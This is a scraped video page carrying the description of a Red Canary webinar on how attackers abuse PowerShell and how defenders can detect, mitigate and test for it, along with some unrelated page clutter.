The Detection Series: Powershell
ฝัง
- เผยแพร่เมื่อ 1 ก.ค. 2024
- We’re exploring one of the year’s most prevalent MITRE ATT&CK® techniques: PowerShell. Join us to learn how adversaries abuse the Windows configuration management framework and how you can observe and detect malicious and suspicious commands and behaviors.
More often than not, T1059.001: PowerShell has been the number one ATT&CK technique in Red Canary’s annual Threat Detection Report. In the five years that we’ve been mapping threats to ATT&CK, there’s no technique we’ve detected more often.
Download the 2023 Threat Detection Report now: redcanary.com/resources/guide...
Installed on nearly every Windows operating system in the world, PowerShell is a versatile tool for automation and remote system management that’s beloved by administrators and adversaries alike. It allows adversaries to execute commands, obfuscate malicious activity, download arbitrary binaries, gather information, change system configurations, and much more-all while blending in with routine operating system activity.
In this highly anticipated Detection Series webinar, experts from VMware Carbon Black, MITRE ATT&CK®, and Red Canary will provide insight into:
Common ways that adversaries abuse PowerShell
Tools and log sources that collect relevant telemetry
How to detect, mitigate, and respond to malicious PowerShell activity
Strategies for testing your security controls by executing suspicious PowerShell commands with Atomic Red Team
Attendees will leave with a better understanding of what PowerShell is and how adversaries leverage it. More importantly, practitioners will know where to find malicious activity, how to develop detection analytics for it, and how to test their detection and visibility capabilities.
Red Canary stops cyber threats no one else does, so organizations can fearlessly pursue their missions. We do it by delivering managed detection and response (MDR) across enterprise endpoints, cloud workloads, network, identities, and SaaS apps. As a security ally, we define MDR in our own terms with unlimited 24×7 support, deep threat expertise, hands-on remediation, and by doing what’s right for customers and partners.
Subscribe to our TH-cam channel for frequently updated (though not overbearing), how-to content about Atomic Red Team, threat hunting in security operations, MDR or Managed Detection and Response, and using the MITRE ATT&CK framework. - วิทยาศาสตร์และเทคโนโลยี
![[Full Episode] MasterChef Junior Thailand มาสเตอร์เชฟ จูเนียร์ ประเทศไทย Season 3 Episode 4](http://i.ytimg.com/vi/e7Oqqo90x_w/mqdefault.jpg)
Powershell was the #2 threat in our 2023 Threat Detection Report. Poke around the entire report now: redcanary.com/resources/guides/threat-detection-report/?